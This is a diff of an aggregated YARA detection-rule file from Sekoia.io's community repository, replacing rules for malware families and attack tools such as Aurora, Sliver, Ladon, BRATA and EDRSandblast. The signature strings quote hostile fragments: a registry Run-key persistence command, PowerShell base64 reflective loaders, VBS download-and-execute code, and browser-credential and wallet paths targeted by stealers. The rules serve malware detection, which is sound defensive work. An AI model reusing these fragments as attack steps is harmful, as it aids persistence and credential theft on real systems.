 		author = "Sekoia.io"
-		id = "2de7aae9-9cf8-4007-aa27-5caea4123713"
-		date = "2023-02-28"
+		id = "55b6cc3e-24b2-4faa-a7fb-b4203a8e6d83"
+		date = "2023-11-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_gost_tunnel_strings.yar#L1-L35"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt41_powershell_collection_script.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "eba1557acc1d9f16817a4bcd24631334a12357e45ad23f1c333de686f20f9291"
+		logic_hash = "8b0462636c9f6270baff2bf09638e94db6d5a0472b8216ddd1919a77b6a63aca"
 		score = 75
-		quality = 80
+		quality = 70
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".(*shadowUDPHandler).transportUDP" ascii
-		$ = ".(*quicCipherConn).decrypt" ascii
-		$ = ".(*socks4aConnector).ConnectContext.func1" ascii
-		$ = ".(*mtlsTransporter).Handshake" ascii
-		$ = ".(*FIFOStrategy).Apply" ascii
-		$ = ".dnsTCPExchanger" ascii
-		$ = ".dohResponseWriter" ascii
-		$ = ".tcpRemoteForwardListener" ascii
-		$ = ".shadowUDPPacketConn" ascii
-		$ = ".sshTunnelListener" ascii
-		$ = "/listener/rtcp/listener.go" ascii
-		$ = "/handler/unix/handler.go" ascii
-		$ = "/handler/tunnel/tunnel.go" ascii
-		$ = "/internal/net/proxyproto/listener.go" ascii
-		$ = "/internal/util/serial/conn.go" ascii
-		$ = "github.com/go-gost/x" ascii
+		$ = "$yestoday.ToString(" ascii wide nocase
+		$ = "$m.LastAccessTime -" ascii wide nocase
+		$ = "$fmat=" ascii wide nocase
+		$ = "$computername" ascii wide nocase
+		$ = "Rar.exe" ascii wide nocase
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xcefaedfe or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xbebafeca ) and 5 of them
+		filesize < 10KB and all of them
 }
-rule SEKOIA_Tool_Chisel_Strings : FILE
+rule SEKOIA_Apt_Mustangpanda_Decrypt_Payload : FILE
 {
 	meta:
-		description = "Detects Chisel"
+		description = "Detects the decryption routine of DAT file"
 		author = "Sekoia.io"
-		id = "667a8aa3-772b-45f1-8c89-acb7b976888d"
-		date = "2024-03-14"
+		id = "7b954007-0929-454d-8a10-05279a337f1b"
+		date = "2022-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_chisel_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_decrypt_payload.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fe389d9d0ae73c79f1040274e21135d4df645c5ac672fc824923f0a5a085be8a"
+		logic_hash = "dcc32580e351e605d21dc29558764c6fd85f8a9506de8e78f301459a5a2610b7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253205,110 +253190,124 @@ rule SEKOIA_Tool_Chisel_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "tunnel.(*Tunnel).handleSSHChannel."
-		$ = "server.(*Server).handleWebsocket"
-		$ = "tunnel.(*udpHandler)"
-		$ = "server.(*Server).tlsLetsEncrypt"
-		$ = "cnet.(*wsConn).SetPingHandler.(*Conn)"
-		$ = "tunnel.(*udpConns).dial."
+		$chunk_1 = {
+        85 ??
+        74 ??
+        8B ??
+        D1 EA
+        A1 ?? ?? ?? ??
+        03 C2
+        A3 ?? ?? ?? ??
+        30 04 29
+        41
+        3B ??
+        72 EC
+        }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 15MB and 3 of them
+		filesize < 8MB and all of them
 }
-rule SEKOIA_Apt_Kimsuky_Sharpext_Jsexfil_Strings : FILE
+rule SEKOIA_Apt_Dark_Pink_Pdb_Path : FILE
 {
 	meta:
-		description = "Detects the exfiltration JS code of SharpExt"
+		description = "Detects PDB path of some Dark Pink sample"
 		author = "Sekoia.io"
-		id = "c9ebd123-6450-4424-93d1-60322bd97bf6"
-		date = "2022-07-29"
+		id = "695586dc-66de-4f9d-814a-2d81261a7357"
+		date = "2023-01-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharpext_jsexfil_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_dark_pink_pdb_path.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "37ea72b369baaced89f30f655901cc4a9d6a70d00cfca3b92a1015aca64d4e2c"
+		logic_hash = "f67e0d50975697424313acc77a9c86e1c2b41fde1663e4f5d8f4765acb997775"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "var req_url" ascii fullword
-		$ = "var newReqId" ascii fullword
-		$ = "chrome.tabs.query" ascii fullword
-		$ = "payload.message.flags = new Object();" ascii fullword
+		$s1 = "C:\\Users\\hoang\\source\\repos\\Cucky\\Cucky\\obj\\Release\\net46\\Cucky.pdb" wide ascii
+		$s2 = "C:\\Users\\build\\source\\repos\\CtealWebCredential\\Release\\CtealWebCredential.pdb" wide ascii
 
 	condition:
-		all of them and filesize < 50KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and any of them
 }
-rule SEKOIA_Loader_Win_Purecrypter : FILE
+rule SEKOIA_Backdoor_Win_Volgmer : FILE
 {
 	meta:
-		description = "Detect the PureCrypter loader"
+		description = "Detect the NukeSped variant called Volgmer used by Andariel"
 		author = "Sekoia.io"
-		id = "500b4d9e-55f8-41d1-ad4f-d587bbeb4507"
-		date = "2022-09-22"
+		id = "9468a66d-787c-488f-937b-22617c7a2ded"
+		date = "2023-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_purecrypter.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_volgmer.yar#L1-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5d0d733a4f8447d2d51656a20640fc9482581e19ba1d53fed7d98e85bb748763"
+		logic_hash = "700fcfcc3df1d81af99db38e305f64ca87f8368fc0149c9ad64d75c2917ec1f3"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061"
+		hash2 = "7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b"
+		hash3 = "8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f"
+		hash4 = "1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1"
 
 	strings:
-		$hex01 = /http:\/\/[^\s]{5,90}_[A-Z][a-z]{7}\.(bmp|jpg|png)/ wide
-		$hex02 = "WrapNonExceptionThrows" ascii
+		$ = "Fixed" wide
+		$ = "CDRom" wide
+		$ = "Removable" wide
+		$ = "%.2fGB" wide
+		$ = "\\*.*" wide
+		$ = "Folder" wide
+		$ = "%.1fKB" wide
+		$ = "%.1fMB" wide
+		$ = "%s\\*.*" wide
+		$ = "%s\\%s\\%s" wide
+		$ = "%s\\%s%s" wide
+		$ = "Remote PC" wide
+		$ = "%s|%s|%s|%s|%s|%s|" wide
+		$ = "%s\\cmd.exe" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $hex02 in ( @hex01 .. @hex01 + 1000 ) or $hex01 in ( @hex02 .. @hex02 + 1000 ) )
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Flash_Infostealer : FILE
+
+rule SEKOIA_Apt_Apt31_Rekoobe : FILE
 {
 	meta:
-		description = "Detects the Gamaredon's Flash InfoStealer"
+		description = "Find Rekoobe sample via Trend Elf Hash (telfhash)"
 		author = "Sekoia.io"
-		id = "f060fe4b-74fd-4ef3-ac86-916e2113ff24"
-		date = "2023-01-24"
+		id = "b1461a72-76ce-4cc5-ac84-3cc87454d288"
+		date = "2023-07-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_flash_infostealer.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt31_rekoobe.yar#L3-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5a3ee8c2c3c377bea7de1993e5ef744796130643575bcce1b6181d68190aafb7"
-		score = 75
+		logic_hash = "88a1a10f26ca355c4be3fd3aa914b1b1ea743018ce44c68a2f4d9e5a337d5c01"
+		score = 40
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$a1 = "Content-Type: multipart/form-data; boundary=----%s" ascii
-		$a2 = "Content-Disposition: form-data; name=\"p\"" ascii
-		$a3 = "Content-Type: application/octet-stream"
-		$w1 = "%s||%s||%s||%s" wide
-		$w2 = "Pragma: no-cache" wide
-		$w3 = { 64 00 6F 00 63 00 00 00 00 00 2E 00 64 00 6F 00 63 00 78 00 }
-
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 2 of ( $a* ) and 2 of ( $w* )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 100KB and elf.telfhash ( ) == "t18fc080c7c6b56a34a7f32538ac7c407982035e1581561b207f50c955d93b408404c5ef"
 }
-
-rule SEKOIA_Infostealer_Win_Aurora_Str : FILE
+rule SEKOIA_Ta410_Control_Flow_Obfuscation : FILE
 {
 	meta:
-		description = "Finds Aurora botnet samples based on characteristic strings."
+		description = "Detects control flow obfuscation used by TA410 in XXXModule_dlcore0"
 		author = "Sekoia.io"
-		id = "1f4391b8-700f-4702-9ef6-68ce3d55a176"
-		date = "2022-07-21"
+		id = "2a784f9b-3624-4c5d-8a64-db7d3c33a8f7"
+		date = "2022-10-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_aurora_str.yar#L3-L34"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ta410_control_flow_obfuscation.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "745443bb58f00cb09a1f323f530219913eaaf0d0e71c9a25af2072006f8c5f92"
+		hash = "6cf78943728286d0bddd99049d81065673ab7f679029cdd5f5dc69f90197136e"
+		logic_hash = "3ee6ee07e7a7be285290ec91de649afff3e5dc222bcfc58709b642d4dd53dc41"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253316,40 +253315,30 @@ rule SEKOIA_Infostealer_Win_Aurora_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Logs.tar" ascii
-		$str02 = "*main.StealerData" ascii
-		$str03 = "AppData\\Roaming\\Armory" ascii
-		$str04 = "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" ascii
-		$str05 = "github.com/TheTitanrain/w32" ascii
-		$str06 = "github.com/mattn/go-sqlite3" ascii
-		$str07 = "ScreenShot" ascii
-		$str08 = "*sql.stmtConnGrabber" ascii
-		$str09 = "Default\\Network\\Cookies" ascii
-		$str10 = "BuildID" ascii
-		$str11 = "Clipper" ascii
-		$str12 = "GeoPos" ascii
-		$str13 = "AppData\\Roaming\\Exodus\\exodus.wallet" ascii
-		$str14 = "FileGrabber\\Documents" ascii
-		$str15 = "193.233.48." ascii
-		$str16 = "ShellExecute" ascii
-		$str17 = "crypto/aes.(*aesCipherGCM).Encrypt" ascii
-		$str18 = "File-Download" ascii
+		$chunk_1 = {
+        E8 ?? ?? ?? ??
+        83 C0 10
+        3D 00 00 00 80
+        7D 01
+        EB ff
+        }
+		$chunk_2 = {83 C0 10 3D 00 00 00 80 7d 01 eb ff e0 50 c3 75}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 14 of them or pe.imphash ( ) == "8ee5c1c09f740fbe63e8b35dac5d6f70" or pe.imphash ( ) == "369b4f5b6c99674f15070689e1f675af" )
+		uint16be( 0 ) == 0x4d5a and filesize < 10MB and any of them
 }
-rule SEKOIA_Backdoor_Powershellempire_Sharpire : FILE
+rule SEKOIA_Trojan_Android_Brata : FILE
 {
 	meta:
-		description = "Detect Sharpire version of Empire"
+		description = "Detect samples of the Android banking trojan BRATA"
 		author = "Sekoia.io"
-		id = "fed21fbd-52ed-4649-a1ff-56eae57fc9ef"
-		date = "2022-04-15"
+		id = "fde9b82e-c677-44ed-b512-b225a3aba201"
+		date = "2022-01-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_sharpire.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_android_brata.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a4da54a16ee1ac3dea3b3b5a5983638ea28fd1e6d580cd48db595f15a92817a1"
+		logic_hash = "0c94e5e0c01d4fa9bf28603787029938a3159f468dd3876e7d25646e93dd68b8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253357,89 +253346,117 @@ rule SEKOIA_Backdoor_Powershellempire_Sharpire : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "GetAgentID" ascii wide
-		$ = "SetAgentID" ascii wide
-		$ = "StartAgentJob" ascii wide
-		$ = "get_JobThread" ascii wide
-		$ = "GetStagerURI" ascii wide
+		$goo0 = "Google Play services error"
+		$goo1 = "Error de Serveis de Google Play"
+		$goo2 = "Fehler bei Zugriff auf Google Play-Dienste"
+		$goo3 = "Erro nos servizos de Google Play"
+		$goo4 = "Fout met Google Play-services"
+		$goo5 = "Virhe Google Play -palveluissa"
+		$goo6 = "Erro do Google Play Services"
+		$goo7 = "Error de Google Play Services"
+		$res0 = "res/xml/device_admin.xml"
+		$res1 = "res/xml/windowchangedetectingservice.xml"
+		$res2 = "res/xml-v22/windowchangedetectingservice.xml"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 1MB
+		uint32be( 0 ) == 0x504B0304 and filesize > 2MB and filesize < 6MB and 7 of ( $goo* ) and 2 of ( $res* )
 }
-rule SEKOIA_Tool_Win_Gosecretsdump : FILE
+rule SEKOIA_Tool_Ladon_Strings : FILE
 {
 	meta:
-		description = "Finds gosecretsdump EXE based on strings"
+		description = "Detects Ladon based on strings"
 		author = "Sekoia.io"
-		id = "9225fe95-e37c-48ff-b5b5-680f255349bd"
-		date = "2024-06-10"
+		id = "7f06f755-a103-4e74-a9df-136355775233"
+		date = "2024-06-03"
 		modified = "2024-12-19"
-		reference = "https://github.com/C-Sto/gosecretsdump/releases"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_gosecretsdump.yar#L1-L27"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_ladon_strings.yar#L1-L61"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "957b0deae745e4fda5a790acc391cebf9d193efb2a19ad5eb18c54da8c17bcfa"
+		logic_hash = "6f2a34bddea2a2370c0a45cde888f51632689973373e3c6ba739a34dc220bfa1"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "github.com/C-Sto/gosecretsdump" ascii
-		$str02 = "/pkg/esent" ascii
-		$str03 = "/pkg/ditreader" ascii
-		$str04 = "/pkg/samreader" ascii
-		$str05 = "ntdsFileLocation" ascii
-		$str06 = "NTDSLoc" ascii
-		$str07 = "SAMEntries" ascii
-		$str08 = "SAMHashAES" ascii
-		$str09 = "NTLMHash" ascii
-		$str10 = "HasNoLMHashPolicy" ascii
-		$str11 = "PreviousIncBackup" ascii
-		$str12 = "Esent_record" ascii
+		$a1 = ".GetType('Ladon.Scan')"
+		$a2 = "= New-object Byte[]("
+		$a3 = "([IO.MemoryStream][Convert]::FromBase64String("
+		$b1 = "DeflateStream([IO.MemoryStream][Convert]::FromBase64String("
+		$b2 = "))}}}}}}}}}"
+		$b3 = "::Main(@($"
+		$b4 = "))} else {If("
+		$b5 = "= [Reflection.Assembly]::Load("
+		$c1 = "ChatLadon.Form1.resources"
+		$c2 = "ChatLadon.Properties.Resources.resources"
+		$c3 = "WebClientUploadEvent"
+		$c4 = "WebClientDownloadEvent"
+		$c5 = "K8robot"
+		$c6 = "K8IPselect"
+		$d1 = "loadASM"
+		$d2 = "ConsoleApp1.exe"
+		$d3 = "K8Ladon"
+		$e1 = "get_network_16px_1219919_easyicon_net"
+		$e2 = "K8gege"
+		$e3 = "LadonExpBuild"
+		$f1 = "Ladon url.txt CitrixVer"
+		$f2 = "Ladon MssqlCmd"
+		$f3 = "Example: Ladon "
+		$f4 = "k8gege.org"
+		$f5 = "K8crack"
+		$g1 = "LadonStudy.exe"
+		$g2 = "LadonStudy.frmMain.resources"
+		$g3 = "LadonStudy.Properties.Resources.resources"
+		$g4 = "K8gege"
+		$h1 = "LadonShell.exe" wide
+		$h2 = "ForceRemove"
+		$h3 = "GetUserObjectInformationA"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 7 of them
+		( all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* ) or all of ( $e* ) or all of ( $f* ) or all of ( $g* ) or all of ( $h* ) ) and filesize < 5MB
 }
-rule SEKOIA_Bumblebee_Loader : FILE
+rule SEKOIA_Exploit_Win_Cloudatlas_Cve_2018_0798 : CVE_2018_0798 FILE
 {
 	meta:
-		description = "Detect the BUMBLEBEE loader"
+		description = "Detect RTF files used by CloudAtlas to exploit CVE-2018-0798"
 		author = "Sekoia.io"
-		id = "8fd795c7-6896-498c-a892-de9da6427b60"
-		date = "2022-05-23"
+		id = "fcff4bc7-fe88-4546-bb5b-f2a1c2f8b0a5"
+		date = "2022-11-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bumblebee_loader.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_win_cloudatlas_cve_2018_0798.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "73c0195c51b5f8c36ab6d7a0e783f1229709d51fc42e2486c02fa65bbbdf955b"
+		logic_hash = "1ed1009d77835f60834c20e61158b00ce7416ade8aa86c3314f4d8d1f6742fa0"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = "CVE-2018-0798, FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "c2064c7f4826c46bc609c472597366fd"
+		hash2 = "e2281402c63d4b544b81678250d24e61"
+		hash3 = "a97fa135d7e42886bcfdacca0d96c047"
 
 	strings:
-		$str0 = { 5a 00 3a 00 5c 00 68 00 6f 00 6f 00 6b 00 65 00 72 00 32 00 5c 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 5c 00 6d 00 64 00 35 00 2e 00 63 00 70 00 70 00 }
-		$str1 = "/gate" ascii
-		$str2 = "3C29FEA2-6FE8-4BF9-B98A-0E3442115F67" wide
-		$str3 = "BLACK" ascii
+		$ = "6060606061616161616161616161616161616161" ascii nocase
+		$ = "FB0B00004bE8FFFFFFFFC35F83C71B33C966B908" ascii nocase
+		$ = "010f0d00ddd8d97424f4668137" ascii nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		uint32be( 0 ) == 0x7b5c7274 and all of them
 }
-rule SEKOIA_Apt_Kimsuky_Toddlershark_Strings : FILE
+rule SEKOIA_Infostealer_Win_Cinoshistealer : FILE
 {
 	meta:
-		description = "Detects Kimsuky TODDLERSHARK vbs malware"
+		description = "Finds Cinoshi Stealer samples based on specific strings, or PE resources"
 		author = "Sekoia.io"
-		id = "2db1a424-9e83-4168-8ebf-d3b415b6a576"
-		date = "2024-03-06"
+		id = "2e9c066b-d5e3-4a25-8954-c10af285bcd3"
+		date = "2023-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_toddlershark_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_cinoshistealer.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "dee9d03f498437dd6d8399975cd91ec44307067ac4642b9ff31df1a6d6b10468"
+		logic_hash = "c4d8418a7bd1bf205295100d993562c89b17b80889cad5aac7a74f89e66543ce"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253447,55 +253464,63 @@ rule SEKOIA_Apt_Kimsuky_Toddlershark_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "On Error Resume Next"
-		$ = ".open \"POST\", \"http"
-		$ = ".setRequestHeader"
-		$ = ".send"
-		$ = "Execute("
-		$ = ".responseText)"
+		$str01 = "Anaida.exe" ascii wide
+		$str02 = "Anaida.pdb" ascii
+		$str03 = "embedder_download_data" ascii
+		$str04 = "date_password_modified" ascii
+		$str05 = "card_number_encrypted" ascii
+		$str06 = "set_UseZip64WhenSaving" ascii
+		$str07 = "set_CommandText" ascii
+		$str08 = "Nss3CouldNotBeLoaded" ascii
+		$str09 = "formhistory.sqlite" wide
+		$str10 = "logins.json" wide
+		$str11 = "\\nss3.dll" wide
+		$str12 = "\\cookies.sqlite" wide
+		$str13 = "\\places.sqlite" wide
+		$str14 = "\\autofill-profiles.json" wide
 
 	condition:
-		all of them and filesize < 450
+		uint16( 0 ) == 0x5a4d and 9 of them and filesize > 400KB
 }
-rule SEKOIA_Rat_Win_Hiddenz : FILE
+
+rule SEKOIA_Implant_Win_Sliver_Dll : FILE
 {
 	meta:
-		description = "Lazy rule to detect Hiddenz's HVNC sample based on te malware name contained in numerous samples"
+		description = "Detect the Sliver DLL based on export names (standalone and process/memory dumps)"
 		author = "Sekoia.io"
-		id = "4e582cda-4c50-4554-8e26-9d26206a02ee"
-		date = "2022-08-24"
+		id = "41d83011-a08b-4245-b633-79fe6afaa4d2"
+		date = "2021-11-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_hiddenz.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_sliver_dll.yar#L3-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "92f62c893d8a081cd52deaaac93d622fbb1c8e9c7df214e34c6b8066be72a424"
+		logic_hash = "251a123fe70338d18c9bc9fb9e0b0d542f2b94203bee8537244e62fa102f371b"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		modification_date = "2021-12-22"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$name0 = "Hiddenz's HVNC" wide ascii
-		$name1 = "Hiddenzs_HVNC_DLL" wide ascii
-		$name2 = "HiddenzHVNC" wide ascii
+		$a1 = "main.RunSliver"
+		$a2 = "main.DllInstall"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $name* )
+		( filesize > 8MB and filesize < 11MB and uint16be( 0 ) == 0x4d5a and pe.characteristics & pe.DLL and pe.exports ( "RunSliver" ) and pe.exports ( "DllInstall" ) and pe.exports ( "VoidFunc" ) ) or ( true and ( uint32be( 0 ) == 0x4d444d50 or uint32be( 0 ) == 0x00000000 ) and $a2 in ( @a1 .. @a1 + 100 ) )
 }
-
-rule SEKOIA_Launcher_Win_Bluehaze : FILE
+rule SEKOIA_Tool_Edrsandblast_Api_Strings : FILE
 {
 	meta:
-		description = "Detect the BLUEHAZE malware"
+		description = "Detects EDRSandblast API strings"
 		author = "Sekoia.io"
-		id = "ccfe0593-0a9f-4369-952e-5cef2f459bb3"
-		date = "2022-12-01"
+		id = "8a5dc171-dce8-4b5a-96e9-53dd1855e8c1"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/launcher_win_bluehaze.yar#L4-L35"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_edrsandblast_api_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "56a9d6d713a5744e77c8d34ad28983bb3b2aded1abff47dbf2d887724bd3ed4e"
+		logic_hash = "cd6afe68cf04e4949add323e0b5af5ea577b3dca07743e312e8236bf5c937672"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253503,25 +253528,28 @@ rule SEKOIA_Launcher_Win_Bluehaze : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Libraries\\CNNUDTV"
-		$ = "cmd.exe /C wuwebv.exe -t -e"
-		$ = "cmd.exe /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ACNTV /t REG_SZ /d \"Rundll32.exe SHELL32.DLL,ShellExec_RunDLL"
+		$ = "[!] Required driver file not present at" wide
+		$ = "[!] New uninstall / install attempt failed" wide
+		$ = "[!] Kernel offsets are missing from the CSV" wide
+		$ = "[+] Downloading wdigest offsets from the MS Symbol Server" wide
+		$ = "[+] Check if EDR callbacks are registered on process" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them or pe.imphash ( ) == "1b3d8fae6035e34f91baa59643746efe" or hash.md5 ( pe.rich_signature.clear_data ) == "44022b7cefeae4d55edcceb5b9bcd295" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1cdcb493593f8793b10e109f6b5b2993" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "276d668ed7d1b46e101425e02a16460f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f6a474220add335b5696256235ce8c9c" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "82bccb3330d50080f86ab1aa566cae8e" )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Tool_Exploit_Comahawk_Strings : FILE
+rule SEKOIA_Apt_Gelsemium_Wolfsbane_Backdoor : FILE
 {
 	meta:
-		description = "Detects COMahawk exploit compiled binaries"
+		description = "Detects Gelsemium's WolfsBane backdoor"
 		author = "Sekoia.io"
-		id = "cc0d10ae-1a14-48c1-9c45-d65fac15f8f1"
-		date = "2022-09-09"
+		id = "db2ad5a4-b592-4646-a385-c668bb2ea090"
